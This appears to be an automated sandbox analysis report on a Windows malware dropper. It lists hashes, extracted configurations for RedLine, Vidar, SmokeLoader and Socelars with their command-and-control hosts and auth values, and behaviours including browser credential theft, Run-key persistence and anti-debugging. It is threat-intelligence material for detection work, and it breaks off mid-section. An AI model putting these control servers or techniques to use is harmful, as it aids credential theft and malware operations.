Analysis
-
max time kernel
603s -
max time network
608s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
11-02-2022 23:33
Static task
static1
Behavioral task
behavioral1
Sample
4ab87d5532ac629b7a3bc7d8f1471781.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
4ab87d5532ac629b7a3bc7d8f1471781.exe
Resource
win10v2004-en-20220113
General
-
Target
4ab87d5532ac629b7a3bc7d8f1471781.exe
-
Size
7.0MB
-
MD5
4ab87d5532ac629b7a3bc7d8f1471781
-
SHA1
2043cc5712af3004825d0d327f2dccbdf4cc40b3
-
SHA256
1ac1284d158c6adafc8d934d5e7f8ed60abeede3aa416e2c8f8f3f768f4c5238
-
SHA512
f3a0a2315b4ddeba9ef79c289064595cc7ba8062df071770be8f9a39f41ac2f8bc2c49190660eb54ea54b13ec8d2e960a0564e2efd4a98c3b32f11810c08b03d
Malware Config
Extracted
socelars
http://www.chosenncrowned.com/
Extracted
redline
media25pqs
65.108.69.168:13293
-
auth_value
e792d0d7a03fceb57d0e07caa26bb34f
Extracted
redline
userv1
159.69.246.184:13127
-
auth_value
1c36bfa23099b197f07410a64d4c862e
Extracted
vidar
49.2
915
https://mstdn.social/@kipriauk9
https://qoto.org/@kipriauk8
-
profile_id
915
Extracted
smokeloader
2020
http://melchen-testet.at/upload/
http://zjymf.com/upload/
http://pbxbmu70275.cn/upload/
http://mnenenravitsya.ru/upload/
http://pitersprav.ru/upload/
Signatures
-
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1580 2820 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 18 IoCs
Processes:
resource yara_rule behavioral2/memory/516-228-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/776-230-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/3612-258-0x0000000000F00000-0x000000000105A000-memory.dmp family_redline behavioral2/memory/5164-284-0x00000000008E0000-0x0000000000A3E000-memory.dmp family_redline behavioral2/memory/3612-278-0x0000000000F00000-0x000000000105A000-memory.dmp family_redline behavioral2/memory/4628-272-0x0000000000E02000-0x0000000000E2F000-memory.dmp family_redline behavioral2/memory/3880-269-0x0000000000F10000-0x000000000106C000-memory.dmp family_redline behavioral2/memory/3612-273-0x0000000000F00000-0x000000000105A000-memory.dmp family_redline behavioral2/memory/3612-266-0x0000000000F02000-0x0000000000F30000-memory.dmp family_redline behavioral2/memory/1376-270-0x0000000000310000-0x000000000046C000-memory.dmp family_redline behavioral2/memory/4628-267-0x0000000000E00000-0x0000000000F56000-memory.dmp family_redline behavioral2/memory/4628-290-0x0000000000E02000-0x0000000000E2F000-memory.dmp family_redline behavioral2/memory/4628-289-0x0000000000E00000-0x0000000000F56000-memory.dmp family_redline behavioral2/memory/4628-292-0x0000000000E00000-0x0000000000F56000-memory.dmp family_redline behavioral2/memory/3880-294-0x0000000000F10000-0x000000000106C000-memory.dmp family_redline behavioral2/memory/1376-287-0x0000000000310000-0x000000000046C000-memory.dmp family_redline behavioral2/memory/3880-291-0x0000000000F10000-0x000000000106C000-memory.dmp family_redline behavioral2/memory/3880-285-0x0000000000F12000-0x0000000000F3F000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\Sun10f1da220d4c037e1.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\Sun10f1da220d4c037e1.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 20 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeschtasks.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 3516 created 4652 3516 WerFault.exe setup_install.exe PID 2820 created 4628 2820 Sun10e55122fb.exe PID 4256 created 1912 4256 WerFault.exe Sun100a1efe5ce7fc0b.exe PID 5568 created 4252 5568 WerFault.exe bbkT8WlwFvEzMukVsZW4p3et.exe PID 5872 created 5224 5872 WerFault.exe X7p8DAJapV2plcOlRWrUMceZ.exe PID 5880 created 5240 5880 WerFault.exe sIpIp8e47BP1VcHVARCfUine.exe PID 2584 created 5240 2584 WerFault.exe sIpIp8e47BP1VcHVARCfUine.exe PID 5752 created 3088 5752 WerFault.exe Sun100b7a261a58b.exe PID 1868 created 4252 1868 WerFault.exe bbkT8WlwFvEzMukVsZW4p3et.exe PID 4736 created 4252 4736 WerFault.exe bbkT8WlwFvEzMukVsZW4p3et.exe PID 5072 created 5224 5072 WerFault.exe schtasks.exe PID 1260 created 4252 1260 WerFault.exe bbkT8WlwFvEzMukVsZW4p3et.exe PID 2924 created 3904 2924 WerFault.exe gItz_jO0wn5_clLVmhUgb743.exe PID 5552 created 4252 5552 schtasks.exe bbkT8WlwFvEzMukVsZW4p3et.exe PID 1764 created 3904 1764 WerFault.exe gItz_jO0wn5_clLVmhUgb743.exe PID 5640 created 3904 5640 WerFault.exe gItz_jO0wn5_clLVmhUgb743.exe PID 2580 created 6068 2580 WerFault.exe jZ0C0q_MJ7VhtEj9FBPpKVeK.exe PID 412 created 4616 412 WerFault.exe tQ2rXUWRH10IT3jetzqneWop.exe PID 5544 created 3468 5544 WerFault.exe StartMenuExperienceHost.exe PID 3916 created 3716 3916 WerFault.exe Tele.exe.pif -
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6
suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
NirSoft WebBrowserPassView 4 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\Sun10544058cc.exe WebBrowserPassView C:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\Sun10544058cc.exe WebBrowserPassView C:\Users\Admin\AppData\Local\Temp\11111.exe WebBrowserPassView behavioral2/memory/4124-227-0x0000000000400000-0x000000000047C000-memory.dmp WebBrowserPassView -
Nirsoft 7 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\Sun10544058cc.exe Nirsoft C:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\Sun10544058cc.exe Nirsoft behavioral2/memory/644-213-0x0000000000400000-0x0000000000455000-memory.dmp Nirsoft C:\Users\Admin\AppData\Local\Temp\11111.exe Nirsoft C:\Users\Admin\AppData\Local\Temp\11111.exe Nirsoft C:\Users\Admin\AppData\Local\Temp\11111.exe Nirsoft behavioral2/memory/4124-227-0x0000000000400000-0x000000000047C000-memory.dmp Nirsoft -
OnlyLogger Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/1912-176-0x0000000000400000-0x0000000000450000-memory.dmp family_onlylogger behavioral2/memory/1912-241-0x0000000000400000-0x0000000000450000-memory.dmp family_onlylogger -
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral2/memory/2228-238-0x0000000000400000-0x00000000004D9000-memory.dmp family_vidar behavioral2/memory/2228-252-0x0000000000820000-0x00000000008F5000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\libstdc++-6.dll aspack_v212_v242 -
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 589 2244 rundll32.exe -
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
Processes:
setup_installer.exesetup_install.exeSun10e3b1ea69c.exeSun100a1efe5ce7fc0b.exeSun104c7903af4dec620.exeSun10f1da220d4c037e1.exeSun103cc3be290a05.exeSun10e55122fb.exeSun10544058cc.exeSun10fe8d167a9b78.exeSun10e4f04359b3ed33c.exeSun100a1efe5ce7fc0b.exeSun1043644c2967579d0.exeSun10c76e04e6f57.exeSun10cb78a30b1eccca7.exeSun103e58edca733.exeSun100b7a261a58b.exeSun1069185a7827c7.exeSun104c7903af4dec620.tmpSun103cc3be290a05.exeSun104c7903af4dec620.exe11111.exeSun104c7903af4dec620.tmpIWvhdszLzpxgS_lCai6WW0lT.exejg1_1faf.exeSun10e3b1ea69c.exeSun1043644c2967579d0.exeo7KJUaxa5gaD8f7BIm2pqaH6.exebbkT8WlwFvEzMukVsZW4p3et.exeWMuLq3PFEFKhhywunmEUHY44.exepbooekKg54FmM_Hnq0O0VsHM.exetQ2rXUWRH10IT3jetzqneWop.exeqRl9cxthRd0UyUtyJWT53C9S.exeFVUso3fdKpZJr6ZfYZazF9yz.exeQ8aXiiq4GluAJF4ibtoj12WW.exeSjirvGC9N8vTXwhRSdpHymlt.exeZB0OKZSL_hIHTo_URFkZ8yyp.exexwl0qPRfHqlOVQ4eWpqD5bN9.exe2nChThzdMr4TJpKUCL8E4CyT.exeIZSCvb_J2727vxUXl0geMMpf.exeSN7DT7Zzyvw7xlDGoteXTShR.exetQfE3xlJTpODnakS0v_20EQV.exeLXJjQNsqHsf0dgXz8zdqYnLd.exebN6daufaTx1pxNi3o1u5ozZZ.exeV7ddKZrv5bDTMO2jx44XA59n.exeSuehZYrYpeTipF5_ZnsUl8Tu.exeX7p8DAJapV2plcOlRWrUMceZ.exesIpIp8e47BP1VcHVARCfUine.exepbooekKg54FmM_Hnq0O0VsHM.exego-memexec-809052243.exeInstall.exeKcBtvrYq9fL_fqAa9lshzZPt.exeInstall.exejZ0C0q_MJ7VhtEj9FBPpKVeK.exeWxso6Fql0X0kQt7DMcN6_hQ5.exefTdq8ETnY6L8ZZrO6IQ2VSQz.exeVOhyRmihGf9WsLhyN6G_g8JR.exegItz_jO0wn5_clLVmhUgb743.exeNVjDgRUuwfUwnIwWJuE8_1Tf.exeM98BM82l1ayaC0dJVcGrs5az.exeVRTW_12CdurcHkoz22bAhYDD.exeInstall.exe2nChThzdMr4TJpKUCL8E4CyT.exepid process 4792 setup_installer.exe 4652 setup_install.exe 4396 Sun10e3b1ea69c.exe 1752 Sun100a1efe5ce7fc0b.exe 1796 Sun104c7903af4dec620.exe 316 Sun10f1da220d4c037e1.exe 220 Sun103cc3be290a05.exe 4628 Sun10e55122fb.exe 4384 Sun10544058cc.exe 1332 Sun10fe8d167a9b78.exe 2400 Sun10e4f04359b3ed33c.exe 1912 Sun100a1efe5ce7fc0b.exe 2728 Sun1043644c2967579d0.exe 2228 Sun10c76e04e6f57.exe 3216 Sun10cb78a30b1eccca7.exe 2828 Sun103e58edca733.exe 3088 Sun100b7a261a58b.exe 3064 Sun1069185a7827c7.exe 4592 Sun104c7903af4dec620.tmp 5108 Sun103cc3be290a05.exe 3964 Sun104c7903af4dec620.exe 644 11111.exe 3708 Sun104c7903af4dec620.tmp 4456 IWvhdszLzpxgS_lCai6WW0lT.exe 4124 jg1_1faf.exe 516 Sun10e3b1ea69c.exe 776 Sun1043644c2967579d0.exe 960 o7KJUaxa5gaD8f7BIm2pqaH6.exe 4252 bbkT8WlwFvEzMukVsZW4p3et.exe 3204 WMuLq3PFEFKhhywunmEUHY44.exe 60 pbooekKg54FmM_Hnq0O0VsHM.exe 4616 tQ2rXUWRH10IT3jetzqneWop.exe 3184 qRl9cxthRd0UyUtyJWT53C9S.exe 3392 FVUso3fdKpZJr6ZfYZazF9yz.exe 3612 Q8aXiiq4GluAJF4ibtoj12WW.exe 1744 SjirvGC9N8vTXwhRSdpHymlt.exe 4324 ZB0OKZSL_hIHTo_URFkZ8yyp.exe 3868 xwl0qPRfHqlOVQ4eWpqD5bN9.exe 4648 2nChThzdMr4TJpKUCL8E4CyT.exe 4840 IZSCvb_J2727vxUXl0geMMpf.exe 3560 SN7DT7Zzyvw7xlDGoteXTShR.exe 5028 tQfE3xlJTpODnakS0v_20EQV.exe 4628 LXJjQNsqHsf0dgXz8zdqYnLd.exe 3880 bN6daufaTx1pxNi3o1u5ozZZ.exe 1376 V7ddKZrv5bDTMO2jx44XA59n.exe 5164 SuehZYrYpeTipF5_ZnsUl8Tu.exe 5224 X7p8DAJapV2plcOlRWrUMceZ.exe 5240 sIpIp8e47BP1VcHVARCfUine.exe 5888 pbooekKg54FmM_Hnq0O0VsHM.exe 5960 go-memexec-809052243.exe 6128 Install.exe 2444 KcBtvrYq9fL_fqAa9lshzZPt.exe 4124 jg1_1faf.exe 5488 Install.exe 6068 jZ0C0q_MJ7VhtEj9FBPpKVeK.exe 4812 Wxso6Fql0X0kQt7DMcN6_hQ5.exe 5096 fTdq8ETnY6L8ZZrO6IQ2VSQz.exe 5824 VOhyRmihGf9WsLhyN6G_g8JR.exe 3904 gItz_jO0wn5_clLVmhUgb743.exe 4248 NVjDgRUuwfUwnIwWJuE8_1Tf.exe 5912 M98BM82l1ayaC0dJVcGrs5az.exe 5724 VRTW_12CdurcHkoz22bAhYDD.exe 636 Install.exe 5804 2nChThzdMr4TJpKUCL8E4CyT.exe -
Modifies Windows Firewall 1 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 21 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
4ab87d5532ac629b7a3bc7d8f1471781.exeSun1069185a7827c7.exeo7KJUaxa5gaD8f7BIm2pqaH6.exeIZSCvb_J2727vxUXl0geMMpf.exePDYHMwz.exeSun10e4f04359b3ed33c.exeSun103e58edca733.exeWMuLq3PFEFKhhywunmEUHY44.exeKcBtvrYq9fL_fqAa9lshzZPt.exejZ0C0q_MJ7VhtEj9FBPpKVeK.exeInstall.exeVRTW_12CdurcHkoz22bAhYDD.exesvchost.exeRoads.exeRoads.exesetup_installer.exeSun103cc3be290a05.exeSun104c7903af4dec620.tmptQfE3xlJTpODnakS0v_20EQV.exeZB0OKZSL_hIHTo_URFkZ8yyp.exeRoads.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation 4ab87d5532ac629b7a3bc7d8f1471781.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Sun1069185a7827c7.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation o7KJUaxa5gaD8f7BIm2pqaH6.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation IZSCvb_J2727vxUXl0geMMpf.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation PDYHMwz.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Sun10e4f04359b3ed33c.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Sun103e58edca733.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation WMuLq3PFEFKhhywunmEUHY44.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation KcBtvrYq9fL_fqAa9lshzZPt.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation jZ0C0q_MJ7VhtEj9FBPpKVeK.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation VRTW_12CdurcHkoz22bAhYDD.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Roads.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Roads.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation setup_installer.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Sun103cc3be290a05.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Sun104c7903af4dec620.tmp Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation tQfE3xlJTpODnakS0v_20EQV.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation ZB0OKZSL_hIHTo_URFkZ8yyp.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Roads.exe -
Loads dropped DLL 64 IoCs
Processes:
setup_install.exeSun104c7903af4dec620.tmpSun104c7903af4dec620.tmpqRl9cxthRd0UyUtyJWT53C9S.exerundll32.exerundll32.exerundll32.exeRoads License Agreement.exerundll32.exeRoads.exeRoads.exeRoads.exeRoads.exeRoads.exeRoads.exeRoads.exeRoads.exeRoads.exeRoads.exerundll32.exeRoads.exepid process 4652 setup_install.exe 4652 setup_install.exe 4652 setup_install.exe 4652 setup_install.exe 4652 setup_install.exe 4652 setup_install.exe 4592 Sun104c7903af4dec620.tmp 3708 Sun104c7903af4dec620.tmp 3184 qRl9cxthRd0UyUtyJWT53C9S.exe 3184 qRl9cxthRd0UyUtyJWT53C9S.exe 3184 qRl9cxthRd0UyUtyJWT53C9S.exe 3184 qRl9cxthRd0UyUtyJWT53C9S.exe 3184 qRl9cxthRd0UyUtyJWT53C9S.exe 5632 rundll32.exe 5632 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 2024 rundll32.exe 2024 rundll32.exe 5480 Roads License Agreement.exe 5480 Roads License Agreement.exe 5964 rundll32.exe 5964 rundll32.exe 5480 Roads License Agreement.exe 5480 Roads License Agreement.exe 5692 Roads.exe 5480 Roads License Agreement.exe 5480 Roads License Agreement.exe 5692 Roads.exe 5692 Roads.exe 3184 qRl9cxthRd0UyUtyJWT53C9S.exe 3348 Roads.exe 3124 Roads.exe 3124 Roads.exe 3124 Roads.exe 3188 Roads.exe 3188 Roads.exe 3188 Roads.exe 1232 Roads.exe 1232 Roads.exe 1232 Roads.exe 3124 Roads.exe 5256 Roads.exe 5256 Roads.exe 5256 Roads.exe 5256 Roads.exe 5196 Roads.exe 5196 Roads.exe 5196 Roads.exe 5196 Roads.exe 2812 Roads.exe 2812 Roads.exe 2812 Roads.exe 2812 Roads.exe 5108 Roads.exe 5108 Roads.exe 5108 Roads.exe 1420 Roads.exe 1420 Roads.exe 1420 Roads.exe 2244 rundll32.exe 5088 Roads.exe 5088 Roads.exe 5088 Roads.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
2nChThzdMr4TJpKUCL8E4CyT.exeRoads License Agreement.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xss_2_1 = "\"C:\\Users\\Admin\\AppData\\Roaming\\xss\\xss_2_1.exe\"" 2nChThzdMr4TJpKUCL8E4CyT.exe Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Windows\CurrentVersion\Run Roads License Agreement.exe Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Roads = "C:\\Users\\Admin\\AppData\\Roaming\\Roads\\Roads.exe --zTwBZr" Roads License Agreement.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
jg1_1faf.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg1_1faf.exe -
Drops Chrome extension 2 IoCs
Processes:
PDYHMwz.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json PDYHMwz.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json PDYHMwz.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
PDYHMwz.exedescription ioc process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini PDYHMwz.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 195 ipinfo.io 232 ipinfo.io 233 ipinfo.io 271 ipinfo.io 272 ipinfo.io 25 ip-api.com 56 ipinfo.io 57 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Drops file in System32 directory 33 IoCs
Processes:
PDYHMwz.exeInstall.exeDVBBKEq.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies PDYHMwz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft PDYHMwz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA PDYHMwz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA PDYHMwz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 PDYHMwz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 PDYHMwz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 PDYHMwz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_A30EA9B4E1BC5DBF09A8EF399E086D27 PDYHMwz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_A30EA9B4E1BC5DBF09A8EF399E086D27 PDYHMwz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 PDYHMwz.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\42F5672C93743CEB7A490AEA00E50796 PDYHMwz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 PDYHMwz.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol DVBBKEq.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini DVBBKEq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache PDYHMwz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content PDYHMwz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_1F49D93822DBBE4B36E384682E6FBA6F PDYHMwz.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 PDYHMwz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_1887A7FD8A4387BA8A4B73EB6F31AC78 PDYHMwz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE PDYHMwz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\42F5672C93743CEB7A490AEA00E50796 PDYHMwz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA PDYHMwz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_12B95D72C791A2846649867B655644CE PDYHMwz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_1F49D93822DBBE4B36E384682E6FBA6F PDYHMwz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_1887A7FD8A4387BA8A4B73EB6F31AC78 PDYHMwz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData PDYHMwz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA PDYHMwz.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol PDYHMwz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_12B95D72C791A2846649867B655644CE PDYHMwz.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
Processes:
Q8aXiiq4GluAJF4ibtoj12WW.exeLXJjQNsqHsf0dgXz8zdqYnLd.exebN6daufaTx1pxNi3o1u5ozZZ.exeV7ddKZrv5bDTMO2jx44XA59n.exeSuehZYrYpeTipF5_ZnsUl8Tu.exejg1_1faf.exeWxso6Fql0X0kQt7DMcN6_hQ5.exeVOhyRmihGf9WsLhyN6G_g8JR.exepid process 3612 Q8aXiiq4GluAJF4ibtoj12WW.exe 4628 LXJjQNsqHsf0dgXz8zdqYnLd.exe 3880 bN6daufaTx1pxNi3o1u5ozZZ.exe 1376 V7ddKZrv5bDTMO2jx44XA59n.exe 5164 SuehZYrYpeTipF5_ZnsUl8Tu.exe 4124 jg1_1faf.exe 4812 Wxso6Fql0X0kQt7DMcN6_hQ5.exe 5824 VOhyRmihGf9WsLhyN6G_g8JR.exe -
Suspicious use of SetThreadContext 6 IoCs
Processes:
